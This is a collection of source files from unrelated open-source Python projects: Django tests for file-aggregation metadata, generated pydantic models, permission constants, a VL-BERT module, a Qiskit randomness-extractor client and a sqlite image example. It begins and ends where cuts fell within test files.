assert res_file.file_folder == mi_folder
assert ModelInstanceLogicalFile.objects.count() == 1
# create a single file aggregation
single_file_name = 'logan.vrt'
file_path = 'pytest/assets/{}'.format(single_file_name)
file_to_upload = UploadedFile(file=open(file_path, 'rb'),
name=os.path.basename(file_path))
res_file = add_file_to_resource(res, file_to_upload, check_target_folder=True)
# set file to generic logical file type (aggregation)
GenericLogicalFile.set_file_type(res, user, res_file.id)
assert GenericLogicalFile.objects.count() == 1
# moving the logan.vrt file into mi_folder should be successful
src_path = 'data/contents/{}'.format(single_file_name)
tgt_path = 'data/contents/{}/{}'.format(mi_folder, single_file_name)
move_or_rename_file_or_folder(user, res.short_id, src_path, tgt_path)
assert not res.dangling_aggregations_exist()
@pytest.mark.django_db(transaction=True)
def test_update_spatial_coverage_from_children(composite_resource_with_mi_aggregation_folder, mock_irods):
"""Here we are testing fileset level spatial coverage update using the spatial data from the
contained (children) aggregations - two child aggregations"""
resource, user = composite_resource_with_mi_aggregation_folder
assert ModelInstanceLogicalFile.objects.count() == 1
mi_aggr = ModelInstanceLogicalFile.objects.first()
# model aggr should not have any spatial coverage
assert mi_aggr.metadata.spatial_coverage is None
# auto create a raster aggregation inside the model instance aggregation
assert GeoRasterLogicalFile.objects.count() == 0
# upload a raster file to the mi_aggr_path - folder that represents the model instance aggregation
raster_file_name = 'small_logan.tif'
raster_file_path = 'hs_file_types/tests/{}'.format(raster_file_name)
_add_files_to_resource(resource=resource, files_to_add=[raster_file_path], upload_folder=mi_aggr.folder)
# there should be three resource files ( one extra vrt file added as part of raster aggregation creation)
assert resource.files.all().count() == 3
# there should be one raster aggregation now
assert GeoRasterLogicalFile.objects.count() == 1
mi_aggr = ModelInstanceLogicalFile.objects.first()
# model aggr should now have spatial coverage
assert mi_aggr.metadata.spatial_coverage is not None
assert mi_aggr.metadata.spatial_coverage.value['northlimit'] == 42.0500269597691
assert mi_aggr.metadata.spatial_coverage.value['eastlimit'] == -111.57773718106195
assert mi_aggr.metadata.spatial_coverage.value['southlimit'] == 41.98722286029891
assert mi_aggr.metadata.spatial_coverage.value['westlimit'] == -111.69756293084055
# auto create a netcdf aggregation inside the model instance aggregation
assert NetCDFLogicalFile.objects.count() == 0
# upload a netcdf file to the folder that represents the model instance aggregation
nc_file_name = "netcdf_valid.nc"
netcdf_file_path = "hs_file_types/tests/{}".format(nc_file_name)
_add_files_to_resource(resource=resource, files_to_add=[netcdf_file_path], upload_folder=mi_aggr.folder)
assert NetCDFLogicalFile.objects.count() == 1
nc_aggr = NetCDFLogicalFile.objects.first()
# netcdf aggr should have spatial coverage
assert nc_aggr.metadata.spatial_coverage is not None
# update model instance aggregation spatial coverage from the contained 2 aggregations
mi_aggr.update_spatial_coverage()
# test model instance aggregation spatial coverage data
assert mi_aggr.metadata.spatial_coverage.value['northlimit'] == 42.0500269597691
assert mi_aggr.metadata.spatial_coverage.value['eastlimit'] == -111.50594036845686
assert mi_aggr.metadata.spatial_coverage.value['southlimit'] == 41.8639080745171
assert mi_aggr.metadata.spatial_coverage.value['westlimit'] == -111.69756293084055
assert not resource.dangling_aggregations_exist()
@pytest.mark.django_db(transaction=True)
def test_no_auto_update_spatial_coverage_from_children(composite_resource_with_mi_aggregation_folder, mock_irods):
"""Here we are testing model instance level spatial coverage auto update does not happen when
a contained aggregation spatial coverage gets created as part of that aggregation creation
since the model instance aggregation has spatial coverage prior to the child aggregation
creation
"""
resource, user = composite_resource_with_mi_aggregation_folder
assert ModelInstanceLogicalFile.objects.count() == 1
mi_aggr = ModelInstanceLogicalFile.objects.first()
# model aggr should not have any spatial coverage
assert mi_aggr.metadata.spatial_coverage is None
# create spatial coverage for model instance
value_dict = {'east': '56.45678', 'north': '12.6789', 'units': 'Decimal degree'}
mi_aggr.metadata.create_element('coverage', type='point', value=value_dict)
# model aggr should now have any spatial coverage
assert mi_aggr.metadata.spatial_coverage is not None
# auto create a raster aggregation inside the model instance aggregation
assert GeoRasterLogicalFile.objects.count() == 0
# upload a raster file to the mi_aggr_path - folder that represents the model instance aggregation
raster_file_name = 'small_logan.tif'
raster_file_path = 'hs_file_types/tests/{}'.format(raster_file_name)
_add_files_to_resource(resource=resource, files_to_add=[raster_file_path], upload_folder=mi_aggr.folder)
# there should be three resource files ( one extra vrt file added as part of raster aggregation creation)
assert resource.files.all().count() == 3
# there should be one raster aggregation now
assert GeoRasterLogicalFile.objects.count() == 1
gr_aggr = GeoRasterLogicalFile.objects.first()
# raster aggr should have spatial coverage
assert gr_aggr.metadata.spatial_coverage is not None
assert gr_aggr.metadata.spatial_coverage.value['northlimit'] == 42.0500269597691
assert gr_aggr.metadata.spatial_coverage.value['eastlimit'] == -111.57773718106195
assert gr_aggr.metadata.spatial_coverage.value['southlimit'] == 41.98722286029891
assert gr_aggr.metadata.spatial_coverage.value['westlimit'] == -111.69756293084055
# check model instance spatial coverage has not been updated
assert mi_aggr.metadata.spatial_coverage.value['east'] == value_dict['east']
assert mi_aggr.metadata.spatial_coverage.value['north'] == value_dict['north']
assert not resource.dangling_aggregations_exist()
@pytest.mark.django_db(transaction=True)
def test_auto_update_temporal_coverage_from_children(composite_resource_with_mi_aggregation_folder, mock_irods):
"""Here we are testing model instance level temporal coverage auto update when
a contained aggregation temporal coverage gets created as part of that aggregation creation
provided the model instance aggregation has no temporal coverage prior to the child aggregation
creation
"""
resource, user = composite_resource_with_mi_aggregation_folder
assert ModelInstanceLogicalFile.objects.count() == 1
mi_aggr = ModelInstanceLogicalFile.objects.first()
# model aggr should not have any temporal coverage
assert mi_aggr.metadata.temporal_coverage is None
# auto create a netcdf aggregation inside the model instance aggregation
assert NetCDFLogicalFile.objects.count() == 0
# upload a netcdf file to the folder that represents the model instance aggregation
nc_file_name = "netcdf_valid.nc"
netcdf_file_path = "hs_file_types/tests/{}".format(nc_file_name)
_add_files_to_resource(resource=resource, files_to_add=[netcdf_file_path], upload_folder=mi_aggr.folder)
assert NetCDFLogicalFile.objects.count() == 1
nc_aggr = NetCDFLogicalFile.objects.first()
# netcdf aggr should have temporal coverage
assert nc_aggr.metadata.temporal_coverage is not None
# model aggr should now have temporal coverage
assert mi_aggr.metadata.temporal_coverage is not None
# temporal coverage of the model instance aggregation should match with that of the contained
# netcdf aggregation
for temp_date in ('start', 'end'):
assert mi_aggr.metadata.temporal_coverage.value[temp_date] == \
nc_aggr.metadata.temporal_coverage.value[temp_date]
assert not resource.dangling_aggregations_exist()
@pytest.mark.django_db(transaction=True)
def test_no_auto_update_temporal_coverage_from_children(composite_resource_with_mi_aggregation_folder, mock_irods):
"""Here we are testing model instance level temporal coverage auto update does not happen when
a contained aggregation temporal coverage gets created as part of that aggregation creation
since the model instance aggregation has temporal coverage prior to the child aggregation
creation
"""
resource, user = composite_resource_with_mi_aggregation_folder
assert ModelInstanceLogicalFile.objects.count() == 1
mi_aggr = ModelInstanceLogicalFile.objects.first()
# model aggr should not have any temporal coverage
assert mi_aggr.metadata.temporal_coverage is None
# create temporal coverage for model instance
value_dict = {'name': 'Name for period coverage', 'start': '1/1/2018', 'end': '12/12/2018'}
mi_aggr.metadata.create_element('coverage', type='period', value=value_dict)
# model aggr should now have temporal coverage
assert mi_aggr.metadata.temporal_coverage is not None
# auto create a netcdf aggregation inside the model instance aggregation
assert NetCDFLogicalFile.objects.count() == 0
# upload a netcdf file to the folder that represents the model instance aggregation
nc_file_name = "netcdf_valid.nc"
netcdf_file_path = "hs_file_types/tests/{}".format(nc_file_name)
_add_files_to_resource(resource=resource, files_to_add=[netcdf_file_path], upload_folder=mi_aggr.folder)
assert NetCDFLogicalFile.objects.count() == 1
nc_aggr = NetCDFLogicalFile.objects.first()
# netcdf aggr should have temporal coverage
assert nc_aggr.metadata.temporal_coverage is not None
# temporal coverage of the model instance aggregation should NOT match with that of the contained
# netcdf aggregation
for temp_date in ('start', 'end'):
assert mi_aggr.metadata.temporal_coverage.value[temp_date] != \
nc_aggr.metadata.temporal_coverage.value[temp_date]
assert not resource.dangling_aggregations_exist()
@pytest.mark.django_db(transaction=True)
def test_update_temporal_coverage_from_children(composite_resource_with_mi_aggregation_folder, mock_irods):
"""Here we are testing model instance level temporal coverage can be updated by user if the contained
aggregations have temporal coverage
"""
resource, user = composite_resource_with_mi_aggregation_folder
assert ModelInstanceLogicalFile.objects.count() == 1
mi_aggr = ModelInstanceLogicalFile.objects.first()
# model aggr should not have any temporal coverage
assert mi_aggr.metadata.temporal_coverage is None
# create temporal coverage for model instance
value_dict = {'name': 'Name for period coverage', 'start': '1/1/2018', 'end': '12/12/2018'}
mi_aggr.metadata.create_element('coverage', type='period', value=value_dict)
# model aggr should now have temporal coverage
assert mi_aggr.metadata.temporal_coverage is not None
# auto create a netcdf aggregation inside the model instance aggregation
assert NetCDFLogicalFile.objects.count() == 0
# upload a netcdf file to the folder that represents the model instance aggregation
nc_file_name = "netcdf_valid.nc"
netcdf_file_path = "hs_file_types/tests/{}".format(nc_file_name)
_add_files_to_resource(resource=resource, files_to_add=[netcdf_file_path], upload_folder=mi_aggr.folder)
assert NetCDFLogicalFile.objects.count() == 1
nc_aggr = NetCDFLogicalFile.objects.first()
# netcdf aggr should have temporal coverage
assert nc_aggr.metadata.temporal_coverage is not None
# temporal coverage of the model instance aggregation should NOT match with that of the contained
# netcdf aggregation
for temp_date in ('start', 'end'):
assert mi_aggr.metadata.temporal_coverage.value[temp_date] != \
nc_aggr.metadata.temporal_coverage.value[temp_date]
# update temporal coverage for model instance from contained aggregations
mi_aggr.update_temporal_coverage()
# temporal coverage of the model instance aggregation should now match with that of the contained
# netcdf aggregation
for temp_date in ('start', 'end'):
assert mi_aggr.metadata.temporal_coverage.value[temp_date] == \
nc_aggr.metadata.temporal_coverage.value[temp_date]
assert not resource.dangling_aggregations_exist()
def _add_files_to_resource(resource, files_to_add, upload_folder=None):
files_to_upload = []
for fl in files_to_add:
file_to_upload = UploadedFile(file=open(fl, 'rb'), name=os.path.basename(fl))
files_to_upload.append(file_to_upload)
added_resource_files = add_resource_files(resource.short_id,
*files_to_upload, folder=upload_folder)
return added_resource_files
|
tests/data/expected/parser/openapi/openapi_parser_parse_duplicate_models/output.py | stevesimmons/datamodel-code-generator | 891 | 12729266 | from __future__ import annotations
from typing import List, Optional
from pydantic import BaseModel
class Pet(BaseModel):
id: int
name: str
tag: Optional[str] = None
class Pets(BaseModel):
__root__: List[Pet]
class Error(BaseModel):
code: int
message: str
class Event(BaseModel):
name: Optional[str] = None
class Result(BaseModel):
event: Optional[Event] = None
class Events(BaseModel):
__root__: List[Event]
class EventRoot(BaseModel):
__root__: Event
class EventObject(BaseModel):
event: Optional[Event] = None
class DuplicateObject1(BaseModel):
event: Optional[List[Event]] = None
class Event1(BaseModel):
event: Optional[Event] = None
class DuplicateObject2(BaseModel):
event: Optional[Event1] = None
class DuplicateObject3(BaseModel):
__root__: Event
|
bcs-ui/backend/container_service/projects/constants.py | laodiu/bk-bcs | 599 | 12729326 | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from enum import Enum
from django.utils.translation import ugettext_lazy as _
from backend.utils.basic import ChoicesEnum
# 管理员标示
SUPER_ROLE = 'manager'
class Policy(Enum):
# 项目管理
PROJECT = 'modify:project:btn'
# 集群管理
CLUSTER = 'cluster:menu'
# 节点管理
NODE = 'node:menu'
# 应用管理
APP = 'app:menu'
# 配置管理
CONFIGURATION = 'configuration:menu'
# 网络管理
NETWORK = 'network:menu'
# 资源管理
RESOURCE = 'resource:menu'
# 仓库管理
REPO = 'repo:menu'
# 仓库按钮
REPO_MODIFY = 'modify:repo:btn'
class PolicyEffect(Enum):
# 正常
NORMAL = 0
# 隐藏
HIDDEN = 1
# 按钮置灰
DISABLED = 2
PolicyLabelOrdering = [_("容器服务"), _("仓库管理"), _("项目管理")]
PolicyOrdering = {
'jfrog': [_("prod环境拉取"), _("prod环境推送"), _("test环境拉取"), _("test环境推送"), _("dev环境拉取"), _("dev环境推送")],
'paas_backend': [_("集群管理"), _("节点管理"), _("应用管理"), _("网络管理"), _("仓库管理"), _("资源管理")],
'apigw': [],
}
class StaffInfoStatus(ChoicesEnum):
# 审批中,默认
NORMAL = 0
INCUMBENCY = 1
RESIGN = 2
TRIAL = 3
WAITING_ENTRY = 8
NOT_ENTRY = 9
_choices_labels = (
(NORMAL, _("正常")),
(INCUMBENCY, _("在职")), # 现在都返回显示正常
(RESIGN, _("已离职")),
(TRIAL, _("试用")),
(WAITING_ENTRY, _("待入职")),
(NOT_ENTRY, _("待入职")),
)
|
pretrain/modules/resnet_vlbert_for_attention_vis.py | xiling42/VL-BERT | 671 | 12729339 | <reponame>xiling42/VL-BERT<gh_stars>100-1000
import os
import torch
import torch.nn as nn
import torch.nn.functional as F
from external.pytorch_pretrained_bert import BertTokenizer
from common.module import Module
from common.fast_rcnn import FastRCNN
from common.visual_linguistic_bert import VisualLinguisticBert
from common.utils.misc import soft_cross_entropy
BERT_WEIGHTS_NAME = 'pytorch_model.bin'
class ResNetVLBERTForAttentionVis(Module):
def __init__(self, config):
super(ResNetVLBERTForAttentionVis, self).__init__(config)
self.image_feature_extractor = FastRCNN(config,
average_pool=True,
final_dim=config.NETWORK.IMAGE_FINAL_DIM,
enable_cnn_reg_loss=False)
self.object_linguistic_embeddings = nn.Embedding(1, config.NETWORK.VLBERT.hidden_size)
if config.NETWORK.IMAGE_FEAT_PRECOMPUTED or (not config.NETWORK.MASK_RAW_PIXELS):
self.object_mask_visual_embedding = nn.Embedding(1, 2048)
if config.NETWORK.WITH_MVRC_LOSS:
self.object_mask_word_embedding = nn.Embedding(1, config.NETWORK.VLBERT.hidden_size)
self.aux_text_visual_embedding = nn.Embedding(1, config.NETWORK.VLBERT.hidden_size)
self.image_feature_bn_eval = config.NETWORK.IMAGE_FROZEN_BN
self.tokenizer = BertTokenizer.from_pretrained(config.NETWORK.BERT_MODEL_NAME)
language_pretrained_model_path = None
if config.NETWORK.BERT_PRETRAINED != '':
language_pretrained_model_path = '{}-{:04d}.model'.format(config.NETWORK.BERT_PRETRAINED,
config.NETWORK.BERT_PRETRAINED_EPOCH)
elif os.path.isdir(config.NETWORK.BERT_MODEL_NAME):
weight_path = os.path.join(config.NETWORK.BERT_MODEL_NAME, BERT_WEIGHTS_NAME)
if os.path.isfile(weight_path):
language_pretrained_model_path = weight_path
if language_pretrained_model_path is None:
print("Warning: no pretrained language model found, training from scratch!!!")
self.vlbert = VisualLinguisticBert(
config.NETWORK.VLBERT,
language_pretrained_model_path=None if config.NETWORK.VLBERT.from_scratch else language_pretrained_model_path
)
# init weights
self.init_weight()
self.fix_params()
def init_weight(self):
if self.config.NETWORK.IMAGE_FEAT_PRECOMPUTED or (not self.config.NETWORK.MASK_RAW_PIXELS):
self.object_mask_visual_embedding.weight.data.fill_(0.0)
if self.config.NETWORK.WITH_MVRC_LOSS:
self.object_mask_word_embedding.weight.data.normal_(mean=0.0, std=self.config.NETWORK.VLBERT.initializer_range)
self.aux_text_visual_embedding.weight.data.normal_(mean=0.0, std=self.config.NETWORK.VLBERT.initializer_range)
self.image_feature_extractor.init_weight()
if self.object_linguistic_embeddings is not None:
self.object_linguistic_embeddings.weight.data.normal_(mean=0.0,
std=self.config.NETWORK.VLBERT.initializer_range)
def train(self, mode=True):
super(ResNetVLBERTForAttentionVis, self).train(mode)
# turn some frozen layers to eval mode
if self.image_feature_bn_eval:
self.image_feature_extractor.bn_eval()
def fix_params(self):
pass
def _collect_obj_reps(self, span_tags, object_reps):
"""
Collect span-level object representations
:param span_tags: [batch_size, ..leading_dims.., L]
:param object_reps: [batch_size, max_num_objs_per_batch, obj_dim]
:return:
"""
span_tags_fixed = torch.clamp(span_tags, min=0) # In case there were masked values here
row_id = span_tags_fixed.new_zeros(span_tags_fixed.shape)
row_id_broadcaster = torch.arange(0, row_id.shape[0], step=1, device=row_id.device)[:, None]
# Add extra diminsions to the row broadcaster so it matches row_id
leading_dims = len(span_tags.shape) - 2
for i in range(leading_dims):
row_id_broadcaster = row_id_broadcaster[..., None]
row_id += row_id_broadcaster
return object_reps[row_id.view(-1), span_tags_fixed.view(-1)].view(*span_tags_fixed.shape, -1)
def forward(self,
image,
boxes,
im_info,
text,
relationship_label,
mlm_labels,
mvrc_ops,
mvrc_labels,
*aux):
# concat aux texts from different dataset
# assert len(aux) > 0 and len(aux) % 2 == 0
aux_text_list = aux[0::2]
aux_text_mlm_labels_list = aux[1::2]
num_aux_text = sum([_text.shape[0] for _text in aux_text_list])
max_aux_text_len = max([_text.shape[1] for _text in aux_text_list]) if len(aux_text_list) > 0 else 0
aux_text = text.new_zeros((num_aux_text, max_aux_text_len))
aux_text_mlm_labels = mlm_labels.new_zeros((num_aux_text, max_aux_text_len)).fill_(-1)
_cur = 0
for _text, _mlm_labels in zip(aux_text_list, aux_text_mlm_labels_list):
_num = _text.shape[0]
aux_text[_cur:(_cur + _num), :_text.shape[1]] = _text
aux_text_mlm_labels[_cur:(_cur + _num), :_text.shape[1]] = _mlm_labels
_cur += _num
###########################################
# visual feature extraction
images = image
box_mask = (boxes[:, :, 0] > -1.5)
origin_len = boxes.shape[1]
max_len = int(box_mask.sum(1).max().item())
box_mask = box_mask[:, :max_len]
boxes = boxes[:, :max_len]
mvrc_ops = mvrc_ops[:, :max_len]
mvrc_labels = mvrc_labels[:, :max_len]
if self.config.NETWORK.IMAGE_FEAT_PRECOMPUTED:
box_features = boxes[:, :, 4:]
box_features[mvrc_ops == 1] = self.object_mask_visual_embedding.weight[0]
boxes[:, :, 4:] = box_features
obj_reps = self.image_feature_extractor(images=images,
boxes=boxes,
box_mask=box_mask,
im_info=im_info,
classes=None,
segms=None,
mvrc_ops=mvrc_ops,
mask_visual_embed=self.object_mask_visual_embedding.weight[0]
if (not self.config.NETWORK.IMAGE_FEAT_PRECOMPUTED)
and (not self.config.NETWORK.MASK_RAW_PIXELS)
else None)
############################################
# prepare text
text_input_ids = text
text_tags = text.new_zeros(text.shape)
text_visual_embeddings = self._collect_obj_reps(text_tags, obj_reps['obj_reps'])
object_linguistic_embeddings = self.object_linguistic_embeddings(
boxes.new_zeros((boxes.shape[0], boxes.shape[1])).long()
)
if self.config.NETWORK.WITH_MVRC_LOSS:
object_linguistic_embeddings[mvrc_ops == 1] = self.object_mask_word_embedding.weight[0]
object_vl_embeddings = torch.cat((obj_reps['obj_reps'], object_linguistic_embeddings), -1)
# add auxiliary text
max_text_len = max(text_input_ids.shape[1], aux_text.shape[1])
text_input_ids_multi = text_input_ids.new_zeros((text_input_ids.shape[0] + aux_text.shape[0], max_text_len))
text_input_ids_multi[:text_input_ids.shape[0], :text_input_ids.shape[1]] = text_input_ids
text_input_ids_multi[text_input_ids.shape[0]:, :aux_text.shape[1]] = aux_text
text_token_type_ids_multi = text_input_ids_multi.new_zeros(text_input_ids_multi.shape)
text_mask_multi = (text_input_ids_multi > 0)
text_visual_embeddings_multi = text_visual_embeddings.new_zeros((text_input_ids.shape[0] + aux_text.shape[0],
max_text_len,
text_visual_embeddings.shape[-1]))
text_visual_embeddings_multi[:text_visual_embeddings.shape[0], :text_visual_embeddings.shape[1]] \
= text_visual_embeddings
text_visual_embeddings_multi[text_visual_embeddings.shape[0]:] = self.aux_text_visual_embedding.weight[0]
object_vl_embeddings_multi = object_vl_embeddings.new_zeros((text_input_ids.shape[0] + aux_text.shape[0],
*object_vl_embeddings.shape[1:]))
object_vl_embeddings_multi[:object_vl_embeddings.shape[0]] = object_vl_embeddings
box_mask_multi = box_mask.new_zeros((text_input_ids.shape[0] + aux_text.shape[0], *box_mask.shape[1:]))
box_mask_multi[:box_mask.shape[0]] = box_mask
###########################################
# Visual Linguistic BERT
encoder_layers, _, attention_probs = self.vlbert(text_input_ids_multi,
text_token_type_ids_multi,
text_visual_embeddings_multi,
text_mask_multi,
object_vl_embeddings_multi,
box_mask_multi,
output_all_encoded_layers=True,
output_attention_probs=True)
hidden_states = torch.stack(encoder_layers, dim=0).transpose(0, 1).contiguous()
attention_probs = torch.stack(attention_probs, dim=0).transpose(0, 1).contiguous()
return {'attention_probs': attention_probs,
'hidden_states': hidden_states}
|
sqlite3__examples/append_image/main.py | DazEB2/SimplePyScripts | 117 | 12729340 | <gh_stars>100-1000
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
import sys
import sqlite3
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
if __name__ == '__main__':
con = sqlite3.connect('test.sqlite')
cur = con.cursor()
cur.execute('''
CREATE TABLE IF NOT EXISTS Images (
Data BLOB
)
''')
con.commit()
with open('capture.png', mode='rb') as f:
binary = sqlite3.Binary(f.read())
cur.execute("INSERT INTO Images(Data) VALUES (?)", (binary,))
con.commit()
app = QApplication([])
w = QWidget()
layout = QVBoxLayout()
w.setLayout(layout)
for (img_data,) in con.execute("SELECT Data from Images"):
pixmap = QPixmap()
pixmap.loadFromData(img_data)
label = QLabel()
label.setPixmap(pixmap)
layout.addWidget(label)
w.show()
sys.exit(app.exec_())
|
src/pipelinex/extras/ops/ignite/metrics/utils.py | MarchRaBBiT/pipelinex | 188 | 12729409 | <gh_stars>100-1000
import torch
from ignite.utils import to_onehot
class ClassificationOutputTransform:
def __init__(self, num_classes=None):
self._num_classes = num_classes
def __call__(self, output):
if isinstance(output, tuple):
y_pred, y = output
elif isinstance(output, dict):
y_pred = output["y_pred"]
y = output["y"]
else:
raise ValueError
if self._num_classes:
y_pred = y_pred.clamp(min=0, max=self._num_classes - 1).long()
y = y.clamp(min=0, max=self._num_classes - 1).long()
y_pred = to_onehot(y_pred, self._num_classes)
else:
y_pred = y_pred.long()
y = y.long()
return y_pred, y
|
qiskit/providers/ibmq/random/cqcextractor.py | dowem/qiskit-ibmq-provider | 199 | 12729412 | # This code is part of Qiskit.
#
# (C) Copyright IBM 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Module for interfacing with a remote extractor."""
import logging
from typing import Optional, Callable, List
import numpy as np
from .utils import generate_wsr, bitarray_to_bytes
from .baserandomservice import BaseRandomService
from .cqcextractorjob import CQCExtractorJob
logger = logging.getLogger(__name__)
class CQCExtractor(BaseRandomService):
"""Class for interfacing with a CQC remote extractor.
There are two extractor methods - Dodis (extractor 1) and Hayashi (extractor 2).
These methods can be invoked synchronously or asynchronously.
To invoke them synchronously::
random_bits = extractor.run(*cqc_parameters)
To invoke them asynchronously::
import numpy as np
extractor1_out = extractor.run_async_ext1(*ext1_parameters).block_until_ready()
extractor2_out = extractor.run_async_ext2(
ext2_seed=extractor1_out, *ext2_parameters).block_until_ready()
random_bits = np.append(extractor1_out, extractor2_out)
Running them asynchronously takes more steps because extractor 2 uses the
output of extractor 1 as its seed, so it must wait for extractor 1 to finish first.
"""
def run( # type: ignore[override]
self,
ext1_input_num_bits: int,
ext1_output_num_bits: int,
ext1_raw_bytes: bytes,
ext1_wsr_bytes: bytes,
ext2_seed_num_bits: int,
ext2_wsr_multiplier: int,
ext2_wsr_generator: Optional[Callable] = None
) -> List[int]:
"""Process input data synchronously.
Args:
ext1_input_num_bits: Number of input bits, for extractor 1.
ext1_output_num_bits: Number of output bits, for extractor 1.
ext1_raw_bytes: Initial random numbers, in bytes, for extractor 1.
ext1_wsr_bytes: Initial WSRs, in bytes, for extractor 1.
ext2_seed_num_bits: Number of bits in the seed, for extractor 2.
ext2_wsr_multiplier: WSR multiplier, for extractor 2. The number of
bits used by extractor 2 is ext2_seed_num_bits*ext2_wsr_multiplier.
ext2_wsr_generator: WSR generator used for extractor 2. It must take the
number of bits as the input and a list of random bits (0s and 1s)
as the output. If ``None``, :func:``generate_wsr`` is used.
Returns:
An instance of ``CQCExtractorJob`` which can be used to retrieve the
results later.
"""
# pylint: disable=arguments-differ
# Run ext1
output = self.run_async_ext1(ext1_input_num_bits, ext1_output_num_bits,
ext1_raw_bytes, ext1_wsr_bytes).block_until_ready()
# Run ext2 if requested.
if ext2_wsr_multiplier != 0:
ext2_out = self.run_async_ext2(
output, ext2_seed_num_bits, ext2_wsr_multiplier,
ext2_wsr_generator).block_until_ready()
output = np.append(output, ext2_out).tolist()
return output
def run_async_ext1(
self,
ext1_input_num_bits: int,
ext1_output_num_bits: int,
ext1_raw_bytes: bytes,
ext1_wsr_bytes: bytes
) -> CQCExtractorJob:
"""Run the first extractor asynchronously.
Args:
ext1_input_num_bits: Number of input bits, for extractor 1.
ext1_output_num_bits: Number of output bits, for extractor 1.
ext1_raw_bytes: Initial random numbers, in bytes, for extractor 1.
ext1_wsr_bytes: Initial WSRs, in bytes, for extractor 1.
Returns:
An instance of ``CQCExtractorJob`` which can be used to retrieve the
results later.
Raises:
ValueError: If an invalid argument values are specified.
"""
if not ext1_input_num_bits or not ext1_output_num_bits:
raise ValueError("Invalid input arguments. ext1_input_num_bits and "
"ext1_output_num_bits must be non-zero.")
logger.info("Starting first extraction.")
# Run ext1
ext1_data = {"n": ext1_input_num_bits,
"m": ext1_output_num_bits}
ext1_files = {"x": ext1_raw_bytes,
"y": ext1_wsr_bytes}
response = self._client.extract(
name='cqc', method='ext1', data=ext1_data, files=ext1_files)
parameters = {'ext1_input_num_bits': ext1_input_num_bits,
'ext1_output_num_bits': ext1_output_num_bits,
'ext1_raw_bytes': ext1_raw_bytes,
'ext1_wsr_bytes': ext1_wsr_bytes}
return CQCExtractorJob(job_id=response['id'], client=self._client, parameters=parameters)
def run_async_ext2(
self,
ext2_seed: List[int],
ext2_seed_num_bits: int,
ext2_wsr_multiplier: int,
ext2_wsr_generator: Optional[Callable] = None
) -> CQCExtractorJob:
"""Run the second extractor asynchronously.
Args:
ext2_seed: Seed used for extractor 2, such as the output of extractor 1.
ext2_seed_num_bits: Number of bits in the seed, for extractor 2.
ext2_wsr_multiplier: WSR multiplier, for extractor 2. The number of
bits used by extractor 2 is ext2_seed_num_bits*ext2_wsr_multiplier.
ext2_wsr_generator: WSR generator used for extractor 2. It must take the
number of bits as the input and a list of random bits (0s and 1s)
as the output. If ``None``, :func:``generate_wsr`` is used.
Returns:
An instance of ``CQCExtractorJob`` which can be used to retrieve the
results later.
Raises:
ValueError: If an invalid argument values are specified.
"""
if not ext2_seed_num_bits or not ext2_wsr_multiplier:
raise ValueError("Invalid input arguments. ext2_seed_num_bits and "
"ext2_wsr_multiplier must be non-zero.")
logger.info("Starting second extraction.")
ext2_seed = bitarray_to_bytes(ext2_seed[:ext2_seed_num_bits]) # type: ignore[assignment]
if ext2_wsr_generator is None:
ext2_wsr_generator = generate_wsr
ext2_wsr = ext2_wsr_generator(ext2_seed_num_bits*ext2_wsr_multiplier)
ext2_wsr = bitarray_to_bytes(ext2_wsr)
ext2_data = {"a": ext2_seed_num_bits,
"b": ext2_wsr_multiplier}
ext2_files = {"r": ext2_seed,
"x": ext2_wsr}
response = self._client.extract(name='cqc', method='ext2',
data=ext2_data, files=ext2_files)
parameters = {'ext2_seed_num_bits': ext2_seed_num_bits,
'ext2_wsr_multiplier': ext2_wsr_multiplier,
'ext2_seed_bytes': ext2_seed,
'ext2_wsr': ext2_wsr}
return CQCExtractorJob(job_id=response['id'], client=self._client, parameters=parameters)
def retrieve_job(self, job_id: str) -> CQCExtractorJob:
"""Retrieve a previously submitted job.
Args:
job_id: Job ID.
Returns:
A ``CQCExtractorJob`` instance.
"""
return CQCExtractorJob(job_id, self._client)
def __repr__(self) -> str:
return "<{}('{}') from {}>".format(self.__class__.__name__,
self.name,
self._provider)
|
bottery/conf/global_settings.py | romulocollopy/bottery | 250 | 12729531 | TEMPLATES = []
PLATFORMS = {}
MIDDLEWARES = []
|
sfm/message_consumer/test_sfm_ui_consumer.py | Xtuden-com/sfm-ui | 129 | 12729556 | <gh_stars>100-1000
from django.test import TestCase
from ui.models import Harvest, Collection, Group, CollectionSet, Credential, User, Seed, Warc, Export, HarvestStat
import json
from .sfm_ui_consumer import SfmUiConsumer
import iso8601
from mock import patch
from datetime import date
class ConsumerTest(TestCase):
def setUp(self):
# Create harvest model object
group = Group.objects.create(name="test_group")
user = User.objects.create_superuser(username="test_user", email="<EMAIL>",
password="<PASSWORD>")
user.groups.add(group)
collection_set = CollectionSet.objects.create(group=group, name="test_collection_set")
credential = Credential.objects.create(user=user, platform="test_platform",
token=json.dumps({}))
collection = Collection.objects.create(collection_set=collection_set, credential=credential,
harvest_type="test_type", name="test_collection",
harvest_options=json.dumps({}))
stream_collection = Collection.objects.create(collection_set=collection_set, credential=credential,
harvest_type=Collection.TWITTER_SAMPLE,
name="test_stream_collection",
harvest_options=json.dumps({}), is_on=True)
self.assertTrue(stream_collection.is_on)
Seed.objects.create(collection=collection, uid="131866249@N02", seed_id='1')
Seed.objects.create(collection=collection, token="library_of_congress", seed_id='2')
historical_collection = collection.history.all()[0]
historical_credential = historical_collection.credential.history.all()[0]
self.harvest = Harvest.objects.create(harvest_id="test:1",
collection=collection,
historical_collection=historical_collection,
historical_credential=historical_credential)
# Creating a second harvest to make sure that harvest stats don't conflict
harvest2 = Harvest.objects.create(harvest_id="test:2",
collection=collection,
historical_collection=historical_collection,
